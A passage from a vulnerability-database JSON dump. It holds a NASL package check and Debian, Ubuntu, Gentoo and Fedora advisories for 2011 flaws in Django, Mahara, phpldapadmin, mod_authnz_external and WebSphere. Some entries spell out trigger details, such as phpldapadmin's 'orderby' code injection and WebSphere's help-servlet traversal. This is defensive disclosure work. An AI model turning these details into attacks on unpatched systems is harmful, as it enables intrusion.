script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202279-1\");\n script_tag(name:\"insight\", value:\"It was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your libapache2-mod-authnz-external packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-authnz-external\", ver:\"3.2.4-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-22T00:10:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2332-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 29, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : python-django\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4136 CVE-2011-4137 CVE-2011-4138 CVE-2011-4139 \n CVE-2011-4140 \nDebian Bug : 641405\n\nPaul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\n When using memory-based sessions and caching, Django sessions are\n stored directly in the root namespace of the cache. When user data is\n stored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\n Django's field type URLfield by default checks supplied URL's by\n issuing a request to it, which doesn't time out. A Denial of Service\n is possible by supplying specially prepared URL's that keep the\n connection open indefinately or fill the Django's server memory.\n\nCVE-2011-4139\n\n Django used X-Forwarded-Host headers to construct full URL's. This\n header may not contain trusted input and could be used to poison the\n cache.\n\nCVE-2011-4140\n\n The CSRF protection mechanism in Django does not properly handle\n web-server configurations supporting arbitrary HTTP Host headers,\n which allows remote attackers to trigger unauthenticated forged\n requests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\nWe recommend that you upgrade your python-django packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-10-29T05:50:53", "type": "debian", "title": "[SECURITY] [DSA 2332-1] python-django security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2011-10-29T05:50:53", "id": "DEBIAN:DSA-2332-1:3B784", "href": "https://lists.debian.org/debian-security-announce/2011/msg00209.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T00:10:46", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2334-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nNovember 04, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mahara\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2771 CVE-2011-2772 CVE-2011-2773 \n\nSeveral vulnerabilities were discovered in Mahara, an electronic \nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\n Teemu Vesala discovered that missing input sanitising of RSS\n feeds could lead to cross-site scripting.\n\nCVE-2011-2772\n \n Richard Mansfield discovered that insufficient upload restrictions\n allowed denial of service.\n\nCVE-2011-2773\n\n Richard Mansfield that the management of institutions was prone to\n cross-site request forgery.\n\n(no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability\n in MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\nWe recommend that you upgrade your mahara packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-11-04T17:51:14", "type": "debian", "title": "[SECURITY] [DSA 2334-1] mahara security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771", "CVE-2011-2772", "CVE-2011-2773"], "modified": "2011-11-04T17:51:14", "id": "DEBIAN:DSA-2334-1:F6AD0", "href": "https://lists.debian.org/debian-security-announce/2011/msg00211.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T00:10:51", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-2333-1 security@debian.org\nhttp://www.debian.org/security/ Jonathan Wiltshire\nOct 31th, 2011 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : phpldapadmin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nDebian bug : 646754\nCVE IDs : CVE-2011-4075 CVE-2011-4074\n\nTwo vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\n Input appended to the URL in cmd.php (when "cmd" is set to "_debug") is\n not properly sanitised before being returned to the user. This can be\n exploited to execute arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n\nCVE-2011-4075\n\n Input passed to the "orderby" parameter in cmd.php (when "cmd" is set to\n "query_engine", "query" is set to "none", and "search" is set to e.g.\n "1") is not properly sanitised in lib/functions.php before being used in a\n "create_function()" function call. This can be exploited to inject and\n execute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\nWe recommend that you upgrade your phpldapadmin packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-10-30T12:29:53", "type": "debian", "title": "[SECURITY] [DSA 2333-1] phpldapadmin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-10-30T12:29:53", "id": "DEBIAN:DSA-2333-1:270B2", "href": "https://lists.debian.org/debian-security-announce/2011/msg00210.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T02:08:00", "description": "Amaya Rodrigo uploaded new packages for libapache2-mod-authnz-external\nwhich fixed the following security problems:\n\nCVE-2011-2688 \n\tRemotely exploitable SQL injection in the mysql auth module.\n\nFor the lenny-backports distribution the problems have been fixed in\nversion 3.2.4-2~bpo50+1.1.\n\nFor the stable distribution (squeeze) the problems have been fixed in\nversion 3.2.4-2.1+squeeze1.\n\nIf you don't use pinning (see [1]) you have to update the package\nmanually via "apt-get -t lenny-backports install <packagelist>" with the\npackagelist of your installed packages affected by this update.\n[1] <http://backports.debian.org/Instructions>\n\nWe recommend to pin (in /etc/apt/preferences) the backports repository\nto 200 so that new versions of installed backports will be installed\nautomatically.\n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n\n\n-- \n .''`. Ex nihilo nihil fit\n: :' :\n`. `'\n `- Proudly running Debian GNU/Linux\nAttachment:\nsignature.asc\nDescription: Digital signature\n", "cvss3": {}, "published": "2011-07-18T09:12:30", "type": "debian", "title": "[BSA-042] Security Update for libapache2-mod-authnz-external", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-18T09:12:30", "id": "DEBIAN:BSA-042:A3B69", "href": "https://lists.debian.org/debian-backports-announce/2011/08/msg00000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T00:18:01", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2279-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJuly 19, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libapache2-mod-authnz-external\nVulnerability : SQL injection\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2688 \nDebian Bug : 633637\n\nIt was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparamter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-07-19T00:49:15", "type": "debian", "title": "[SECURITY] [DSA 2279-1] libapache2-mod-authnz-external security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-19T00:49:15", "id": "DEBIAN:DSA-2279-1:127D6", "href": "https://lists.debian.org/debian-security-announce/2011/msg00153.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T13:09:01", "description": "Pall McMillan discovered that Django used the root namespace when storing \ncached session data. A remote attacker could exploit this to modify \nsessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary URLs \nwhen the application used URLFields. This could be exploited by a remote \nattacker to cause a denial of service via resource exhaustion. \n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of a \nURL via a HEAD request, it would instead use a GET request for the target \nof a redirect. This could potentially be used to trigger arbitrary GET \nrequests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP Host \nheader to construct a full URL. A remote attacker could exploit this to \nconduct host header cache poisoning attacks via a crafted request. \n(CVE-2011-4139)\n", "cvss3": {}, "published": "2011-12-09T00:00:00", "type": "ubuntu", "title": "Django vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4137"], "modified": "2011-12-09T00:00:00", "id": "USN-1297-1", "href": "https://ubuntu.com/security/notices/USN-1297-1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2334-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nNovember 04, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mahara\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2771 CVE-2011-2772 CVE-2011-2773 \r\n\r\nSeveral vulnerabilities were discovered in Mahara, an electronic \r\nportfolio, weblog, and resume builder:\r\n\r\nCVE-2011-2771\r\n\r\n Teemu Vesala discovered that missing input sanitising of RSS\r\n feeds could lead to cross-site scripting.\r\n\r\nCVE-2011-2772\r\n \r\n Richard Mansfield discovered that insufficient upload restrictions\r\n allowed denial of service.\r\n\r\nCVE-2011-2773\r\n\r\n Richard Mansfield that the management of institutions was prone to\r\n cross-site request forgery.\r\n\r\n(no CVE ID available yet)\r\n\r\n Andrew Nichols discovered a privilege escalation vulnerability\r\n in MNet handling.\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.0.4-4+lenny11.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.2.6-2+squeeze3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.1-1.\r\n\r\nWe recommend that you upgrade your mahara packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk60JbcACgkQXm3vHE4uylqocwCgkWMz4J7ZDTxntTrLf0iYmfAZ\r\nwGUAoLG1TDXaqNB+YgJcTuYqKpkTD8y5\r\n=4JlU\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27278", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27278", "title": "[SECURITY] [DSA 2334-1] mahara security update", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-1359"], "description": "Title\r\n-----\r\nDDIVRT-2011-33 IBM WebSphere Application Server 'help' Servlet Plug-in Bundle Directory Traversal [CVE-2011-1359]\r\n\r\nSeverity\r\n--------\r\nHigh\r\n\r\nDate Discovered\r\n---------------\r\nJuly 28, 2011\r\n\r\nDiscovered By\r\n-------------\r\nDigital Defense, Inc. Vulnerability Research Team\r\nCredit: Javier Castro, sxkeebler and r@b13$\r\n\r\nVulnerability Description\r\n-------------------------\r\nThe default installation of the IBM WebSphere Application Server is \r\ndeployed with a 'help' servlet which is designed to serve supporting \r\ndocumentation for the WebSphere system. When the 'help' servlet \r\nprocesses a URL that contains a reference to a Java plug-in Bundle \r\nthat is registered with the Eclipse Platform Runtime Environment of \r\nthe WebSphere Application Server, the 'help' servlet fails to ensure \r\nthat the submitted URL refers to a file that is both located within the \r\nweb root of the servlet and is of a type that is allowed to be served.\r\n\r\nAn unauthenticated remote attacker can use this weakness in the \r\n'help' servlet to retrieve arbitrary system files from the host that \r\nis running the 'help' servlet. This can be accomplished by submitting \r\na URL which refers to a registered Java plug-in Bundle followed by a \r\nrelative path to the desired file.\r\n\r\nSolution Description\r\n--------------------\r\nIBM has released a patch for this issue. The patch is available through APAR PM45322.\r\n\r\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21509257\r\n\r\nTested Systems / Software (with versions)\r\n------------------------------------------\r\nWebSphere Application Server Version 8.0\r\nWebSphere Application Server Version 7.0\r\nWebSphere Application Server Version 6.1\r\n\r\nVendor Contact\r\n--------------\r\nVendor Name: IBM\r\nVendor Website: http://www-01.ibm.com/software/webservers/appserv/was/library/\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27281", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27281", "title": "DDIVRT-2011-33 IBM WebSphere Application Server 'help' Servlet Plug-in Bundle Directory Traversal [CVE-2011-1359]", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:43", "description": "SQL injection via username.", "edition": 1, "cvss3": {}, "published": "2011-07-22T00:00:00", "title": "Apache mod_authnz_external module SQL injection", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11801", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11801", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 201110-23\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Low\r\n Title: Apache mod_authnz_external: SQL injection\r\n Date: October 25, 2011\r\n Bugs: #386165\r\n ID: 201110-23\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nAn input sanitation flaw in mod_authnz_external allows remote attacker\r\nto conduct SQL injection.\r\n\r\nBackground\r\n==========\r\n\r\nmod_authnz_external is a tool for creating custom authentication\r\nbackends for HTTP basic authentication.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 www-apache/mod_authnz_external\r\n < 3.2.6 >= 3.2.6 \r\n\r\nDescription\r\n===========\r\n\r\nmysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\r\ninput before using it in an SQL query.\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could exploit this vulnerability to inject arbitrary\r\nSQL statements by using a specially crafted username for HTTP\r\nauthentication on a site using mod_authnz_external.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Apache mod_authnz_external users should upgrade to the latest\r\nversion:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot -v ">=www-apache/mod_authnz_external-3.2.6"\r\n\r\nReferences\r\n==========\r\n\r\n[ 1 ] CVE-2011-2688\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2688\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-201110-23.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users' machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttps://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2011 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "cvss3": {}, "published": "2011-11-06T00:00:00", "title": "[ GLSA 201110-23 ] Apache mod_authnz_external: SQL injection", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27267", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2279-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nJuly 19, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : libapache2-mod-authnz-external\r\nVulnerability : SQL injection\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2688 \r\nDebian Bug : 633637\r\n\r\nIt was discovered that libapache2-mod-authnz-external, an apache\r\nauthentication module, is prone to an SQL injection via the $user\r\nparamter.\r\n\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 3.2.4-2+squeeze1.\r\n\r\nThe oldstable distribution (lenny) does not contain\r\nlibapache2-mod-authnz-external\r\n\r\nFor the testing distribution (wheezy), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 3.2.4-2.1.\r\n\r\n\r\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk4k068ACgkQ62zWxYk/rQdEcACgl9otukAtTDPLIWRr8b7JlbCn\r\ngKYAniArSm7L6ND92ROY1fVsDgiKXD7R\r\n=07Sp\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2011-07-22T00:00:00", "title": "[SECURITY] [DSA 2279-1] libapache2-mod-authnz-external security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26677", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26677", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. ", "cvss3": {}, "published": "2011-11-25T01:52:56", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: phpldapadmin-1.2.1.1-2.20111006git.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-25T01:52:56", "id": "FEDORA:6627020EBD", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PWRDH3BGAWZISS3STXZ4QP5Y3NH5OQOL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. ", "cvss3": {}, "published": "2011-11-25T01:56:24", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: phpldapadmin-1.2.1.1-2.20111006git.fc14", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-25T01:56:24", "id": "FEDORA:559EA20CFA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2G3I5QLFDGXU3ON4NDE22OFWRI6Y6BND/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. ", "cvss3": {}, "published": "2011-11-25T02:05:42", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: phpldapadmin-1.2.1.1-2.20111006git.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 